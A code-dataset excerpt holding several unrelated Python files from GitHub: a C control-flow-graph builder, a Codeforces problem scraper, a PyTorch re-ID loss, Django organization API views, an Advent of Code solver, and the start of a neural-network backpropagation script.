OperationBin(var.name, val, \"=\"))\n cfg.exit = ex[1]\n return cfg\n else:\n raise Exception(\"Unexpected type of declaration/\" + str(d))\n elif type(p) is pycparser.c_ast.While:\n logging.debug(\"While\")\n w: pycparser.c_ast.While = p\n label_break = stack_break.push()\n gm = GotoManager()\n goto_dict[label_break] = gm\n cond = parse_exp(w.cond, pre) # Here assignment cannot come here\n body_cfg = construct_CFG_help(w.stmt, pre, goto_dict, returns, stack_break)\n stack_break.pop()\n body_cfg = body_cfg if body_cfg is not None else ControlFlowGraph()\n if cond.val[0] == \"Nondet\":\n cond_in = CFGValue()\n cond_out = CFGValue()\n else:\n cond_in = cond\n cond_out = CFGValue((\"Unary\", \"!\", cond))\n cfg = ControlFlowGraph()\n exit_node = cfg.add_edge(cfg.initial, None, cond_out, None)[1] # from branching to exit\n gm.target = exit_node\n branch_node = cfg.initial\n cfg = join_CFG(cfg, body_cfg, branch_node, body_cfg.initial, cond_in, goto_dict, returns) #from branching to main\n cfg.add_edge(cfg.exit, branch_node, CFGValue(), None) # from the bottom to top\n cfg.exit = exit_node\n return cfg\n elif type(p) is pycparser.c_ast.If:\n logging.debug(\"If\")\n i: pycparser.c_ast.If = p\n cond = parse_exp(i.cond, pre)\n if cond.val[0] == \"Nondet\":\n cond_if = CFGValue()\n cond_else = CFGValue()\n else:\n cond_if = cond\n cond_else = CFGValue((\"Unary\", \"!\", cond))\n if_cfg = construct_CFG_help(i.iftrue, pre, goto_dict, returns, stack_break)\n if_cfg = if_cfg if if_cfg is not None else ControlFlowGraph()\n cfg = ControlFlowGraph()\n branch_node = cfg.initial\n cfg = join_CFG(cfg, if_cfg, branch_node, if_cfg.initial, cond_if, goto_dict, returns)\n if cfg.final == cfg.exit:\n if_dying = True\n else:\n if_dying = False\n exit_node = cfg.add_edge(cfg.exit, None, CFGValue(), None)[1]\n cfg.exit = exit_node\n if i.iffalse is None:\n if if_dying:\n exit_node = cfg.add_edge(branch_node, None, cond_else, None)[1]\n cfg.exit = exit_node\n else:\n cfg.add_edge(branch_node, exit_node, cond_else, None)\n else:\n else_cfg = construct_CFG_help(i.iffalse, pre, goto_dict, returns, stack_break)\n else_cfg = else_cfg if else_cfg is not None else ControlFlowGraph()\n cfg = join_CFG(cfg, else_cfg, branch_node, else_cfg.initial, cond_else, goto_dict, returns)\n if if_dying:\n if else_cfg.final == else_cfg.exit:\n cfg.exit = cfg.final\n else:\n exit_node = cfg.add_edge(cfg.exit, None, CFGValue(), None)[1]\n cfg.exit = exit_node\n else:\n cfg.add_edge(cfg.exit, exit_node, CFGValue(), None)\n cfg.exit = exit_node\n return cfg\n elif type(p) is pycparser.c_ast.Assignment:\n a: pycparser.c_ast.Assignment = p\n logging.debug(f\"Assigning {a.lvalue.name}\")\n varname = pre + a.lvalue.name\n val = parse_exp(a.rvalue)\n cfg = ControlFlowGraph()\n ex = cfg.add_edge(cfg.initial, None, CFGValue(), OperationBin(varname, val, a.op))\n cfg.exit = ex[1]\n return cfg\n elif type(p) is pycparser.c_ast.FuncCall:\n fc: pycparser.c_ast.FuncCall = p\n logging.debug(f\"FuncCall {fc.name.name}\")\n if is_error_function(fc.name.name):\n cfg = ControlFlowGraph()\n cfg.add_edge(cfg.initial, cfg.final, CFGValue(), None)\n cfg.exit = cfg.final\n logging.log(logging.DEBUG, \"added edge\")\n return cfg\n elif is_assumption(fc.name.name):\n cond = parse_exp(fc.args.exprs[0], pre)\n cfg = ControlFlowGraph()\n ex = cfg.add_edge(cfg.initial, None, cond, None)\n cfg.exit = ex[1]\n return cfg\n elif is_assertion(fc.name.name):\n cond = parse_exp(fc.args.exprs[0], pre)\n cond_neg = CFGValue((\"Unary\", \"!\", cond))\n cfg = ControlFlowGraph()\n ex = cfg.add_edge(cfg.initial, None, cond, None)\n cfg.add_edge(cfg.initial, cfg.final, cond_neg, None)\n cfg.exit = ex[1]\n return cfg\n else:\n raise Exception(f\"Unexpected function call {fc.name}\")\n elif type(p) is pycparser.c_ast.Compound:\n comp = p\n if comp.block_items is None:\n return ControlFlowGraph()\n else:\n cfgs = [construct_CFG_help(b, pre, goto_dict, returns, stack_break) for b in comp.block_items]\n return join_CFGs(cfgs, goto_dict, returns)\n elif type(p) is pycparser.c_ast.Goto:\n cfg = ControlFlowGraph()\n if p.name not in goto_dict:\n goto_dict[p.name] = GotoManager()\n goto_dict[p.name].sources.add(cfg.initial)\n print(\"added source\", goto_dict[p.name], goto_dict[p.name].sources)\n return cfg\n elif type(p) is pycparser.c_ast.Label:\n name = p.name\n stmt = p.stmt\n\n cfg_main = construct_CFG_help(stmt, pre, goto_dict, returns, stack_break)\n if name not in goto_dict:\n goto_dict[name] = GotoManager()\n goto_dict[name].target = cfg_main.initial\n\n return cfg_main\n elif type(p) is pycparser.c_ast.Return:\n c = ControlFlowGraph()\n returns.add(c.initial)\n return c # TODO: it can be fixed when it needs subproceedure\n elif type(p) is pycparser.c_ast.UnaryOp:\n cfg = ControlFlowGraph()\n varname = p.expr.name\n ex = cfg.add_edge(cfg.initial, None, CFGValue(), OperationUni(varname, p.op))\n cfg.exit = ex[1]\n return cfg\n elif type(p) is pycparser.c_ast.For:\n init = construct_CFG_help(p.init, pre, goto_dict, returns, stack_break)\n cond = parse_exp(p.cond, pre)\n cfg_next = construct_CFG_help(p.next, pre, goto_dict, returns, stack_break)\n\n if cond.val[0] == \"Nondet\":\n cond_in = CFGValue()\n cond_out = CFGValue()\n else:\n cond_in = cond\n cond_out = CFGValue((\"Unary\", \"!\", cond))\n \n exit_node = init.add_edge(init.exit, None, cond_out, None)[1] # from branching to exit\n branch_node = init.exit\n label_break = stack_break.push()\n gm = GotoManager()\n gm.target = exit_node\n goto_dict[label_break] = gm\n body_cfg = construct_CFG_help(p.stmt, pre, goto_dict, returns, stack_break)\n stack_break.pop()\n body_cfg = join_CFG(body_cfg, cfg_next, body_cfg.exit, cfg_next.initial, CFGValue(), goto_dict, returns)\n # body_cfg.add_edge(body_cfg.exit, body_cfg.initial, CFGValue(), None)\n cfg = join_CFG(init, body_cfg, branch_node, body_cfg.initial, cond_in, goto_dict, returns) #from branching to main\n cfg.add_edge(cfg.exit, branch_node, CFGValue(), None) # from the bottom to top\n cfg.exit = exit_node\n return cfg\n elif type(p) is pycparser.c_ast.EmptyStatement \\\n or p is None \\\n or (type(p) is pycparser.c_ast.Typename and p.name is None):\n return ControlFlowGraph()\n elif type(p) is pycparser.c_ast.Break:\n cfg = ControlFlowGraph()\n goto_dict[stack_break.get_top()].sources.add(cfg.initial)\n print(\"added source (break)\", goto_dict[stack_break.get_top()], goto_dict[stack_break.get_top()].sources)\n return cfg\n else:\n raise Exception(\"Unexpected type \" + str(p))\n raise Exception(\"Forgot returning somewhere\")\n\ndef connect_goto(res, goto_dict):\n for k, v in goto_dict.items():\n print(k, v.sources, v.target)\n assert v.target in res.nodes\n for s in v.sources:\n assert s in res.nodes\n edges = s.going\n while len(edges) > 0:\n e = next(edges.__iter__())\n res.remove_edge(e)\n if k == \"ERROR\":\n tgt = res.final\n else:\n tgt = v.target\n res.add_edge(s, tgt, CFGValue(), None)\n return res\n\ndef connect_returns(res, returns):\n for r in returns:\n assert r in res.nodes\n edges = r.going\n while len(edges) > 0:\n e = next(edges.__iter__())\n res.remove_edge(e)\n if r != res.exit and r != res.final:\n res.add_edge(r, res.exit, CFGValue(), None)\n return res\n\ndef construct_CFG(p: pycparser.c_ast.Node, mode: str, bitwidth: int, pre: str = \"\") -> ControlFlowGraph:\n goto_dict = {}\n returns = set()\n stack_break = BreakManager()\n res = construct_CFG_help(p, pre, goto_dict, returns, stack_break)\n returns.add(res.final)\n print(\"returns\", returns)\n res = connect_returns(res, returns)\n res = connect_goto(res, goto_dict)\n print(\"goto_dict:\", goto_dict)\n if res is None:\n assert False\n else:\n res.make_predicates(mode, bitwidth)\n return res\n\n\ndef main():\n # x = pycparser.parse_file(sys.argv[1])\n if len(sys.argv) > 1:\n x = pycparser.parse_file(sys.argv[1])\n else:\n x = pycparser.parse_file(\"01xx.c\")\n\n \n\n # with open(sys.argv[1]) as f:\n # text = f.read()\n # print(text)\n \n # parser = c_parser.CParser()\n # ast = parser.parse(text)\n\n # print(dir(ast))\n # print(ast)\n x.show()\n cfg = construct_CFG(x)\n cfg.print()\n\n cfg._check_consistency()\n\nif __name__ == \"__main__\":\n main()","repo_name":"ERATOMMSD/mind_the_gap","sub_path":"experiment/CFG.py","file_name":"CFG.py","file_ext":"py","file_size_in_byte":35844,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"2385307554","text":"import time as tsleep\nfrom urllib.request import urlopen\nfrom bs4 import BeautifulSoup\nimport os\nimport random as rd\ndroppedLinks = []\nqpages = []\nfor i in range(1,33):\t#Get all pages which contain problems\n\tqpages.append(\"http://codeforces.com/problemset/page/\" + str(i))\n\nf = open(\"questions.csv\",'w') #Write to this file\n#Headings of the csv file.\nf.write(\"Problem ID\"+\",\"+\"Problem Name\"+\",\"+\"Title Tags\"+\",\"+\"Plain Tags,\"+\"Number Solved\"+\"\\n\")\nfor qpage in qpages:\n\ttry : \n\t\tpage = urlopen(qpage)\n\t\ttsleep.sleep(3)\n\texcept Exception:\n\t\tqpages.append(qpage)\n\t\tcontinue\n\tsoup = BeautifulSoup(page)\n\ttable = soup.find_all('table',attrs={\"class\":\"problems\"})[0]\n\trows = table.find_all('tr')[1:]\n\tprint(qpage)\n\tfor row in rows:\n\t\tcols = row.find_all('td')\n\t\tpid = cols[0].get_text().strip()\n\t\tpname,tags = cols[1].find_all('div')\n\t\t\n\t\tpname = \"\".join(pname.get_text().strip().split(\",\"))\n\t\ttags = tags.find_all('a')\n\t\tnum = cols[3].get_text().strip()[1:]\n\t\tkeytags = []\n\t\tplaintags = []\n\t\tfor i in tags:\n\t\t\tplaintags.append(\"\".join(i.get_text().strip().split(\",\")))\n\t\t\tthetag = \"\".join(i['title'].split(\",\"))\n\t\t\tkeytags.append(thetag)\n\t\t\t#print(i['title'])\n\t\tkt = \"|\".join(keytags)\t#Adding the key tags with separator |\n\t\tpt = \"|\".join(plaintags) #Adding the title plain tags with separator |\n\t\t\n\t\tf.write(pid+\",\"+pname+\",\"+kt+\",\"+pt+\",\"+num+\"\\n\")\n","repo_name":"chittaranjan19/competitive-coding-analysis","sub_path":"Scripts/Scraping/questionScrape.py","file_name":"questionScrape.py","file_ext":"py","file_size_in_byte":1347,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"29922189267","text":"from __future__ import absolute_import\n\nimport torch\nimport torch.nn.functional as F\nfrom torch import nn, autograd\nimport numpy as np\n\n\nclass Exclusive(autograd.Function):\n def __init__(self, M):\n super(Exclusive, self).__init__()\n self.M = M\n\n def forward(self, inputs, index,positive_index):\n self.save_for_backward(inputs, index,positive_index)\n\n N = inputs.size(0)\n K= index.size(1)\n\n logits = torch.zeros(N,K).to(inputs.device)\n for i in range(N):\n logits[i] = inputs[i:i + 1].mm(self.M[index[i]].t())\n #logits=inputs.mm(self.M.t())\n return logits\n\n def backward(self, grad_outputs):\n inputs, index, positive_index = self.saved_tensors\n N,C=inputs.size()\n grad_inputs=torch.zeros(N,C).to(inputs.device)\n\n for i in range(N):\n grad_inputs[i] = grad_outputs[i:i + 1].mm(self.M[index[i]])\n\n\n # print(targets)\n for x, y in zip(inputs, positive_index):\n self.M[y] = F.normalize((self.M[y] + x) / 2, p=2, dim=0)\n\n return grad_inputs, None, None\n\n\n\n\nclass ExLoss(nn.Module):\n def __init__(self, num_features, num_classes, t=1.0,\n weight=None):\n super(ExLoss, self).__init__()\n self.num_features = num_features\n self.num_classes = num_classes\n self.t = t\n self.weight = weight\n self.index_list = np.arange(num_classes)\n\n self.register_buffer('M', torch.zeros(num_classes, num_features))\n\n def forward(self, inputs, positive_index,negative_index, cof):\n\n index_list=torch.cat((positive_index,negative_index),dim=1)\n\n\n loss = 0\n N,K=positive_index.size()\n\n for j in range(positive_index.size(1)):\n logits=Exclusive(self.M)(inputs,index_list,index_list[:,j])*self.t\n loss += cof[j] * F.cross_entropy(logits, j + torch.zeros(N, dtype=torch.int64).to(device=inputs.device),\n weight=self.weight)\n #loss += cof[j] * F.cross_entropy(logits, targets[:,j],weight=self.weight)\n return loss, logits\n\n\n\n\ndef loss_fn(criterion, inputs,positive_index,negative_index, lambda_t, positive_num, alpha):\n\n cof = np.zeros(positive_num+1)\n cof[0] = lambda_t\n cof[1:] = alpha * (1 - lambda_t) / positive_num\n loss, outputs = criterion(inputs, positive_index,negative_index, cof)\n\n\n return loss, outputs\n","repo_name":"pangbo1997/Unsup_ReID","sub_path":"engine/loss.py","file_name":"loss.py","file_ext":"py","file_size_in_byte":2430,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"48"} +{"seq_id":"5059934203","text":"from utils import format_attribute\nfrom class_components import ClassComponent, BaseComponent, SpellComponent, SorcererComponent, BardComponent\n\n\ndef class_factory(**kwargs):\n name = kwargs.get(\"name\", \"\")\n\n if name == \"Sorcerer\":\n return Sorcerer(**kwargs)\n elif name == \"Bard\":\n return Bard(**kwargs)\n else:\n return DefaultClass(**kwargs)\n\n\nclass Class(object):\n def __init__(self, components):\n self.abilities = []\n self.attributes = []\n\n for component in components:\n if not isinstance(component, ClassComponent):\n raise TypeError(\"invalid compenent type\")\n\n self.abilities += component.get_abilities()\n self.attributes += component.get_attributes()\n\n for attr, label in self.attributes:\n setattr(self, label, attr)\n\n def __str__(self):\n class_str = \"|----- {} ({}) -----|\\n\".format(self.name, self.level)\n\n for data, label in self.abilities:\n if len(data) < 1:\n continue\n\n class_str += label + '\\n'\n for datum in data:\n class_str += format_attribute(datum['name'],\n datum['description'])\n\n return class_str\n\n def to_dict(self):\n attr_dict = {}\n\n for attr, label in self.attributes:\n attr_dict[label] = attr\n\n return attr_dict\n\n\nclass DefaultClass(Class):\n def __init__(self, **kwargs):\n components = [\n BaseComponent(**kwargs)\n ]\n\n super().__init__(components)\n\n\nclass Sorcerer(Class):\n def __init__(self, **kwargs):\n components = [\n BaseComponent(**kwargs),\n SpellComponent(**kwargs),\n SorcererComponent(**kwargs)\n ]\n\n super().__init__(components)\n\n\nclass Bard(Class):\n def __init__(self, **kwargs):\n components = [\n BaseComponent(**kwargs),\n SpellComponent(**kwargs),\n BardComponent(**kwargs)\n ]\n super().__init__(components)\n","repo_name":"williamh890/pynd","sub_path":"classes.py","file_name":"classes.py","file_ext":"py","file_size_in_byte":2072,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"8484632462","text":"from typing import Sized\nfrom unittest import TestCase as TC\n\n\nclass TestCase(TC):\n '''\n TestCase extension class\n '''\n\n def assertLen(self, expected: int, lst: Sized, msg: str = ''):\n length = len(lst)\n if length != expected:\n message = f'{length} != {expected}'\n if msg != '':\n message += f' {msg}'\n\n raise AssertionError(message)\n","repo_name":"elegos/python-blessedui","sub_path":"tests/case.py","file_name":"case.py","file_ext":"py","file_size_in_byte":407,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"18186445501","text":"import os\nimport tempfile\nimport argparse\nimport json\n\nparser = argparse.ArgumentParser()\nparser.add_argument('--key', nargs='?')\nparser.add_argument('--value', nargs='?')\ndata = parser.parse_args()\n\nstorage_path = os.path.join(tempfile.gettempdir(), 'storage.data')\nif os.path.exists(storage_path)== False :\n with open(storage_path, 'w') as f:\n f.write('')\n\nwith open(storage_path, 'r+') as f:\n context = f.read()\n storage = {}\n if context !='':\n storage = json.loads(context)\n if(data.value != None and data.key in storage):\n storage[data.key] = \"{}, {}\".format(storage[data.key],data.value)\n if (data.value != None and data.key not in storage):\n storage[data.key] = data.value\n if (data.value == None and data.key in storage):\n print(storage[data.key])\n if (data.value == None and data.key not in storage):\n print('None')\n\n json_data = json.dumps(storage)\n f.seek(0)\n f.write(json_data)\n f.truncate()\n\n","repo_name":"eriixon/pythonBegins","sub_path":"storage.py","file_name":"storage.py","file_ext":"py","file_size_in_byte":983,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"69997770065","text":"from django.shortcuts import render\nfrom rest_framework.response import Response\nfrom rest_framework.views import APIView\nfrom rest_framework import status\nfrom django.db.models import Q\nfrom django.db import connection\n\nfrom app.helper_functions import get_user_id\n\nfrom .models import Organizations, AreasCatered\nfrom .serializers import OrganizationsSerializer, AreasCateredSerializer\n\nclass OrganizatonView(APIView):\n\n def post(self, request):\n token = request.headers.get('Authorization', None)\n if token is None or token==\"\":\n connection.close()\n return Response({\"message\":\"Authorization credentials missing\"}, status=status.HTTP_403_FORBIDDEN)\n \n payload = get_user_id(token)\n if payload['_id'] is None:\n connection.close()\n return Response({\"message\":payload['message']}, status=status.HTTP_403_FORBIDDEN)\n\n print(request.data)\n org_data = {}\n org_data['name'] = request.data.get(\"name\", None)\n org_data['city'] = request.data.get(\"city\", None)\n org_data['state'] = request.data.get(\"state\", None)\n org_data['country'] = request.data.get(\"country\", None)\n org_data['description'] = request.data.get(\"description\", None)\n org_data['email'] = request.data.get(\"email\", None)\n org_data['phone_no'] = request.data.get(\"phone_no\", None)\n org_data['address'] = request.data.get(\"address\", None)\n org_data['other_contact'] = request.data.get(\"other_contact\", None)\n org_data['web_links'] = request.data.get(\"web_links\", None)\n \n areas_catered = request.data.get(\"areas_catered\", None)\n if areas_catered==None or len(areas_catered)==0:\n connection.close()\n return Response({\"message\":\"Please provide Areas catered\"}, status=status.HTTP_400_BAD_REQUEST)\n\n serializer = OrganizationsSerializer(data=request.data)\n if serializer.is_valid():\n serializer.save()\n print(serializer.data['id'])\n for area in areas_catered:\n area['org_id'] = serializer.data['id']\n area_serializer = AreasCateredSerializer(data=area)\n if area_serializer.is_valid():\n area_serializer.save()\n else:\n print(area_serializer.errors)\n\n connection.close()\n return Response({\"message\":\"Organization Saved\", \"organization\":serializer.data}, status=status.HTTP_201_CREATED)\n\n else:\n connection.close()\n return Response({\"message\":serializer.errors}, status=status.HTTP_400_BAD_REQUEST)\n\n def get(self, request, pk):\n token = request.headers.get('Authorization', None)\n if token is None or token==\"\":\n connection.close()\n return Response({\"message\":\"Authorization credentials missing\"}, status=status.HTTP_403_FORBIDDEN)\n \n payload = get_user_id(token)\n if payload['_id'] is None:\n connection.close()\n return Response({\"message\":payload['message']}, status=status.HTTP_403_FORBIDDEN)\n\n try:\n org = Organizations.objects.get(id=pk)\n serializer = OrganizationsSerializer(org)\n serializer = serializer.data\n areas = AreasCatered.objects.filter(org_id=pk)\n areas_serializer = AreasCateredSerializer(areas, many=True)\n serializer['areas_catered'] = areas_serializer.data\n connection.close()\n return Response({\"message\":\"Organization Found\", \"Organization\":serializer}, status=status.HTTP_200_OK)\n except Organizations.DoesNotExist:\n connection.close()\n return Response({\"message\":\"Organization Does Not Exist\"}, status=status.HTTP_400_BAD_REQUEST)\n\n\nclass UserViewOrganization(APIView):\n\n def get(self, request):\n token = request.headers.get('Authorization', None)\n if token is None or token==\"\":\n connection.close()\n return Response({\"message\":\"Authorization credentials missing\"}, status=status.HTTP_403_FORBIDDEN)\n\n city = request.query_params.get(\"city\", None)\n state = request.query_params.get(\"state\", None)\n country = request.query_params.get(\"country\", None)\n \n payload = get_user_id(token)\n if payload['_id'] is None:\n connection.close()\n return Response({\"message\":payload['message']}, status=status.HTTP_403_FORBIDDEN)\n\n orgs = Organizations.objects.all()\n result = []\n for org in orgs:\n if org.is_verified:\n serializer = OrganizationsSerializer(org)\n serializer = serializer.data\n areas = AreasCatered.objects.filter(org_id=org.id)\n areas_serializer = AreasCateredSerializer(areas, many=True)\n serializer['areas_catered'] = areas_serializer.data\n result.append(serializer)\n\n field = None\n field_value = None\n\n if city!=None and city!=\"\":\n field = 'city'\n field_value = city.lower()\n elif state!=None and state!=\"\":\n field = 'state'\n field_value = state.lower()\n elif country!=None and country!=\"\":\n field = 'country'\n field_value = country.lower()\n\n to_remove = []\n\n if field!=None:\n for org in result:\n areas = org['areas_catered']\n should_remove = True\n for area in areas: \n if field_value==(area[field].lower()):\n should_remove = False\n if should_remove:\n to_remove.append(org)\n\n for item in to_remove:\n result.remove(item)\n\n key = 1\n for item in result:\n item['key'] = key\n key += 1\n \n if len(result)==0:\n connection.close()\n return Response({\"message\":\"Organizations not found\"}, status=status.HTTP_204_NO_CONTENT)\n\n connection.close()\n return Response({\"message\":\"Organizaions found\", \"Organization\":result}, status=status.HTTP_200_OK)\n\nclass AdminOrganizationView(APIView):\n\n def get(self, request):\n token = request.headers.get('Authorization', None)\n if token is None or token==\"\":\n connection.close()\n return Response({\"message\":\"Authorization credentials missing\"}, status=status.HTTP_403_FORBIDDEN)\n \n payload = get_user_id(token)\n if payload['_id'] is None:\n connection.close()\n return Response({\"message\":payload['message']}, status=status.HTTP_403_FORBIDDEN)\n\n orgs = Organizations.objects.all()\n \n if len(orgs)==0:\n connection.close()\n return Response({\"message\":\"No Organizations Found\"}, status=status.HTTP_204_NO_CONTENT)\n\n serializer = OrganizationsSerializer(orgs, many=True)\n serializer = serializer.data\n key = 1\n for item in serializer:\n areas = AreasCatered.objects.filter(id=item['id'])\n area_serializer = AreasCateredSerializer(areas, many=True)\n item['areas_catered'] = area_serializer.data\n item['key'] = key\n key += 1\n \n connection.close()\n return Response({\"message\":\"Organizations Found\", \"Organization\":serializer}, status=status.HTTP_200_OK)\n\nclass VerifyOrganizationView(APIView):\n\n def get(self, request, pk):\n token = request.headers.get('Authorization', None)\n if token is None or token==\"\":\n connection.close()\n return Response({\"message\":\"Authorization credentials missing\"}, status=status.HTTP_403_FORBIDDEN)\n \n payload = get_user_id(token)\n if payload['_id'] is None:\n connection.close()\n return Response({\"message\":payload['message']}, status=status.HTTP_403_FORBIDDEN)\n\n try:\n org = Organizations.objects.get(id=pk)\n org.is_verified = True\n org.save()\n connection.close()\n return Response({\"message\":\"Organization Verified\"}, status=status.HTTP_200_OK)\n except Organizations.DoesNotExist:\n connection.close()\n return Response({\"message\":\"Organization Does Not Exist\"}, status=status.HTTP_400_BAD_REQUEST)","repo_name":"AshDarkfold/akina-education-devhack","sub_path":"project/backend/hestia-requests/app/organizations_view.py","file_name":"organizations_view.py","file_ext":"py","file_size_in_byte":8427,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"27734186383","text":"from collections import deque, OrderedDict\nfrom sys import maxsize, stdin\n\n\ndef parse_floor(line):\n items = []\n\n if ' contains a ' in line:\n _, line = line.split(' contains ')\n line = line[:-1].replace(', and ', ', ').replace(' and ', ', ')\n\n for part in line.split(', '):\n part = part[2:].replace('-compatible ', ' ')\n material, category = part.split()\n items.append((material, category))\n\n return items\n\n\ndef is_done(floors):\n return not any(floors[:-1])\n\n\ndef is_safe(items):\n generators = [m for m, c in items if c == 'generator']\n microchips = [m for m, c in items if c == 'microchip']\n return not generators or all(m in generators for m in microchips)\n\n\ndef generate_neighbors(source_floor, floors):\n target_floors = [\n i\n for i in [source_floor - 1, source_floor + 1]\n if 0 <= i < len(floors)\n ]\n\n source_items = floors[source_floor]\n item_lists = []\n\n for i, item in enumerate(source_items):\n item_lists.append([item])\n\n if len(source_items) >= 2:\n for j in range(i + 1, len(source_items)):\n item_lists.append([item, source_items[j]])\n\n for items in item_lists:\n new_source_items = [item for item in source_items if item not in items]\n\n if not is_safe(new_source_items):\n continue\n\n for target_floor in target_floors:\n new_target_items = floors[target_floor] + items\n\n if not is_safe(new_target_items):\n continue\n\n new_floors = list(floors)\n new_floors[source_floor] = new_source_items\n new_floors[target_floor] = new_target_items\n yield target_floor, new_floors\n\n\ndef to_key(floor, floors, materials, categories):\n for i, items in enumerate(floors):\n for material, category in items:\n j = materials[material]\n categories[category][j] = i\n\n return floor, tuple(sorted(zip(*categories.values())))\n\n\ndef main():\n floors = [parse_floor(line.strip()) for line in stdin]\n\n extra_items = [\n (material, category)\n for material in ('dilithium', 'elerium')\n for category in ('generator', 'microchip')\n ]\n\n floors[0] += extra_items\n\n materials = {}\n generators = []\n microchips = []\n categories = OrderedDict(generator=generators, microchip=microchips)\n\n for i, items in enumerate(floors):\n for material, category in items:\n if material not in materials:\n materials[material] = len(materials)\n generators.append(-1)\n microchips.append(-1)\n\n queue = deque([[0, 0, floors]])\n visited = set()\n\n while queue:\n step, floor, floors = queue.popleft()\n key = to_key(floor, floors, materials, categories)\n\n if key in visited:\n continue\n\n visited.add(key)\n\n if is_done(floors):\n print(step)\n return\n\n for new_floor, new_floors in generate_neighbors(floor, floors):\n queue.append([step + 1, new_floor, new_floors])\n\n\nif __name__ == '__main__':\n main()\n","repo_name":"elemel/advent-of-code","sub_path":"python/2016/day_11/part_2.py","file_name":"part_2.py","file_ext":"py","file_size_in_byte":3150,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"12792764219","text":"# This Python file uses the following encoding: utf-8\nfrom __future__ import division\nimport random, math\nimport matplotlib.pyplot as plt\nfrom sklearn.metrics import confusion_matrix\n# from scipy.interpolate import spline\n# from sklearn.metrics import classification_report\n# from sklearn.metrics import accuracy_score\n\ndef dot(X, w):\n \"\"\"\n Função que soma o produto dos elementos de duas listas\n Parâmetro: X, w - entradas e pesos em formato de lista\n Retorna: soma dos produtos dos elementos de X por w\n \"\"\"\n return sum(X[i]*w[i] for i in range(len(X)))\n\ndef weight_init(input_size, num_hidden, output_size):\n \"\"\"\n Função que inicializa os pesos e bias aleatoriamente utilizando random\n Parâmetro: num_inputs - quantidade de entradas X\n num_hidden - quantidade de camadas ocultas\n Retorna: w,b - pesos e bias da rede inicializados\n \"\"\"\n # inicializa os pesos e bias para os neuronios da camada oculta\n random.seed(0)\n\n hidden_layer = [[random.random() for __ in range(input_size + 1)]\n for __ in range(num_hidden)]\n\n # inicializa os pesos e bias para os neuronios da camada de saída\n output_layer = [[random.random() for __ in range((num_hidden or input_size) + 1)]\n for __ in range(output_size)]\n\n return hidden_layer, output_layer\n\ndef activation_func(func_type, z):\n \"\"\"\n Função que implementa as funções de ativação mais comuns\n Parãmetros: func_type - uma string que contém a função de ativação desejada\n z - vetor com os valores de entrada X multiplicado pelos pesos\n Retorna: saída da função de ativação\n \"\"\"\n ### Seu código aqui (~2 linhas)\n if func_type == 'sigmoid':\n return 1 / (1 + math.exp(-z))\n elif func_type == 'tanh':\n return math.tanh(z)\n elif func_type == 'relu':\n return max(0, z)\n elif func_type == 'degrau':\n return 0 if z < 0 else 1 if z > 0 else 0.5\n elif func_type == 'signum':\n return -1 if z < 0 else 1 if z > 0 else 0\n elif func_type == 'linear':\n return z\n\ndef derivative_func(func_type, z):\n \"\"\"\n Função que implementa as derivadas das funções de ativação mais comuns\n Parãmetros: func_type - uma string que contém a derivada da função de ativação desejada\n z - vetor com os valores de entrada X multiplicado pelos pesos\n Retorna: saída da derivada da função de ativação\n \"\"\"\n ### Seu código aqui (~2 linhas)\n if func_type == 'sigmoid':\n return z * (1 - z)\n elif func_type == 'tanh':\n return (1 - z**2) / 2\n elif func_type == 'relu':\n return 1 if z >= 0 else 0\n elif func_type == 'degrau':\n return 0 if z <= 0 else 1\n elif func_type == 'signum':\n return 0 if z == 0 else 1\n elif func_type == 'linear':\n return 0 if z == 0 else 1\n\ndef forward(neural_network, X, activation_fn):\n \"\"\"\n Função que implementa a etapa forward propagate da rede neural\n Parâmetros: neural_network - lista (camadas) de listas (neurônios) de listas (pesos com bias)\n X - entradas\n \"\"\"\n outputs = []\n for n, layer in enumerate(neural_network):\n X_with_bias = X + [1] # para facilitar a multiplicação X * Ws, inclui o peso 1 para o bias\n # OR para o caso de não haver a camada oculta - perceptron de camada única\n layer_output = [activation_func(activation_fn if n == 1 else 'tanh', dot(X_with_bias, neuron)) for neuron in layer] or X\n X = layer_output\n\n outputs.append(layer_output)\n return outputs\n\ndef backpropagation(training_matrix, neural_network, learning_rate, activation_fn, num_epoch, batch_size, momentum=0):\n \"\"\"\n Função que implementa o loop do treinamento com backpropagation\n Parâmetros: x - entrada da rede\n y - rótulos/labels\n neural_network - lista (camadas) de listas (neurônios) de listas (pesos com bias)\n num_interaction - quantidade de interações desejada para a rede convergir\n learning_rate - taxa de aprendizado para cálculo do erro\n \"\"\"\n training_len = len(training_matrix)\n\n E_med_training = []\n\n old_out_deltas = []\n old_hid_deltas = []\n for __ in range(num_epoch):\n\n E_med = 0\n\n num_batch = 0\n\n for X, y in training_matrix:\n\n hidden_outputs, outputs = forward(neural_network, X, activation_fn)\n\n E_med += sum([(y[i] - output)**2 for i, output in enumerate(outputs)])\n\n num_batch += 1\n\n if num_batch == 1:\n # deltas da camada de saída\n output_deltas = [derivative_func(activation_fn, output) * (y[i] - output)\n for i, output in enumerate(outputs)]\n\n # deltas da camada oculta\n hidden_deltas = [derivative_func('tanh', hidden_output) *\n dot(output_deltas, [n[i] for n in neural_network[-1]])\n for i, hidden_output in enumerate(hidden_outputs)]\n else:\n output_deltas = [output_deltas[i] + delta\n for j, delta in enumerate([derivative_func(activation_fn, output) * (y[i] - output)\n for i, output in enumerate(outputs)])]\n\n hidden_deltas = [hidden_deltas[i] + delta\n for j, delta in enumerate([derivative_func(activation_fn, hidden_output) *\n dot(output_deltas, [n[i] for n in neural_network[-1]])\n for i, hidden_output in enumerate(hidden_outputs)])]\n\n if num_batch in [batch_size, training_len]:\n # ajusta os pesos para a camada de saída\n for i, output_neuron in enumerate(neural_network[-1]):\n for j, hidden_output in enumerate(hidden_outputs + [1]):\n output_neuron[j] += learning_rate * output_deltas[i] * hidden_output\n if momentum and old_out_deltas:\n output_neuron[j] 